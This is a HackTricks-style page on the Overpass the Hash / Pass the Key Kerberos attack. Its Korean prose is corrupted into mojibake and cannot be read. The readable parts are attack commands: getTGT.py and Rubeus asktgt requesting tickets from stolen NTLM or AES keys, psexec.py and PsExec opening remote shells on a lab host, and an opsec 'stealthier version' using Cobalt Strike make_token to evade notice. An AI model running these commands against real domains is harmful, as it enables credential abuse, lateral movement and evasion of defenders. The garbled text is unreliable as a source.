Over Pass the Hash/Pass the Key

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Overpass The Hash/Pass The Key (PTK)

Overpass The Hash/Pass The Key (PTK) ๊ณต๊ฒฉ์€ ์ „ํ†ต์ ์ธ NTLM ํ”„๋กœํ† ์ฝœ์ด ์ œํ•œ๋˜๊ณ  Kerberos ์ธ์ฆ์ด ์šฐ์„ ์‹œ๋˜๋Š” ํ™˜๊ฒฝ์„ ์œ„ํ•ด ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด ๊ณต๊ฒฉ์€ ์‚ฌ์šฉ์ž์˜ NTLM ํ•ด์‹œ ๋˜๋Š” AES ํ‚ค๋ฅผ ํ™œ์šฉํ•˜์—ฌ Kerberos ํ‹ฐ์ผ“์„ ์š”์ฒญํ•จ์œผ๋กœ์จ ๋„คํŠธ์›Œํฌ ๋‚ด์˜ ๋ฆฌ์†Œ์Šค์— ๋Œ€ํ•œ ๋ฌด๋‹จ ์ ‘๊ทผ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

์ด ๊ณต๊ฒฉ์„ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ์ฒซ ๋ฒˆ์งธ ๋‹จ๊ณ„๋Š” ๋Œ€์ƒ ์‚ฌ์šฉ์ž์˜ ๊ณ„์ •์˜ NTLM ํ•ด์‹œ ๋˜๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํš๋“ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด ์ •๋ณด๋ฅผ ํ™•๋ณดํ•œ ํ›„, ํ•ด๋‹น ๊ณ„์ •์— ๋Œ€ํ•œ ํ‹ฐ์ผ“ ๋ถ€์—ฌ ํ‹ฐ์ผ“(TGT)์„ ์–ป์„ ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ์„ ๊ฐ€์ง„ ์„œ๋น„์Šค๋‚˜ ๋จธ์‹ ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด ํ”„๋กœ์„ธ์Šค๋Š” ๋‹ค์Œ ๋ช…๋ น์–ด๋กœ ์‹œ์ž‘ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

AES256์ด ํ•„์š”ํ•œ ์‹œ๋‚˜๋ฆฌ์˜ค์—์„œ๋Š” -aesKey [AES key] ์˜ต์…˜์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ, ํš๋“ํ•œ ํ‹ฐ์ผ“์€ smbexec.py ๋˜๋Š” wmiexec.py์™€ ๊ฐ™์€ ๋‹ค์–‘ํ•œ ๋„๊ตฌ์™€ ํ•จ๊ป˜ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์–ด ๊ณต๊ฒฉ์˜ ๋ฒ”์œ„๋ฅผ ๋„“ํž™๋‹ˆ๋‹ค.

PyAsn1Error ๋˜๋Š” _KDC cannot find the name_๊ณผ ๊ฐ™์€ ๋ฌธ์ œ๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ Impacket ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ์—…๋ฐ์ดํŠธํ•˜๊ฑฐ๋‚˜ IP ์ฃผ์†Œ ๋Œ€์‹  ํ˜ธ์ŠคํŠธ ์ด๋ฆ„์„ ์‚ฌ์šฉํ•˜์—ฌ ํ•ด๊ฒฐ๋˜๋ฉฐ, Kerberos KDC์™€์˜ ํ˜ธํ™˜์„ฑ์„ ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค.

Rubeus.exe๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๋Œ€์ฒด ๋ช…๋ น ์‹œํ€€์Šค๋Š” ์ด ๊ธฐ์ˆ ์˜ ๋˜ ๋‹ค๋ฅธ ์ธก๋ฉด์„ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค:

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

์ด ๋ฐฉ๋ฒ•์€ Pass the Key ์ ‘๊ทผ ๋ฐฉ์‹์„ ๋ฐ˜์˜ํ•˜๋ฉฐ, ์ธ์ฆ ๋ชฉ์ ์œผ๋กœ ํ‹ฐ์ผ“์„ ์ง์ ‘ ์žฅ์•…ํ•˜๊ณ  ํ™œ์šฉํ•˜๋Š” ๋ฐ ์ค‘์ ์„ ๋‘ก๋‹ˆ๋‹ค. TGT ์š”์ฒญ์˜ ์‹œ์ž‘์€ ์ด๋ฒคํŠธ 4768: A Kerberos authentication ticket (TGT) was requested๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•˜๋ฉฐ, ์ด๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ RC4-HMAC ์‚ฌ์šฉ์„ ๋‚˜ํƒ€๋‚ด์ง€๋งŒ, ์ตœ์‹  Windows ์‹œ์Šคํ…œ์€ AES256์„ ์„ ํ˜ธํ•ฉ๋‹ˆ๋‹ค.

์šด์˜ ๋ณด์•ˆ์— ๋ถ€ํ•ฉํ•˜๊ณ  AES256์„ ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์Œ ๋ช…๋ น์„ ์ ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Stealthier version

Warning

๊ฐ ๋กœ๊ทธ์˜จ ์„ธ์…˜์€ ํ•œ ๋ฒˆ์— ํ•˜๋‚˜์˜ ํ™œ์„ฑ TGT๋งŒ ๊ฐ€์งˆ ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ ์ฃผ์˜ํ•˜์„ธ์š”.

  1. Cobalt Strike์˜ **make_token**์„ ์‚ฌ์šฉํ•˜์—ฌ ์ƒˆ๋กœ์šด ๋กœ๊ทธ์˜จ ์„ธ์…˜์„ ๋งŒ๋“ญ๋‹ˆ๋‹ค.
  2. ๊ทธ๋Ÿฐ ๋‹ค์Œ, Rubeus๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ธฐ์กด ์„ธ์…˜์— ์˜ํ–ฅ์„ ์ฃผ์ง€ ์•Š๊ณ  ์ƒˆ๋กœ์šด ๋กœ๊ทธ์˜จ ์„ธ์…˜์— ๋Œ€ํ•œ TGT๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ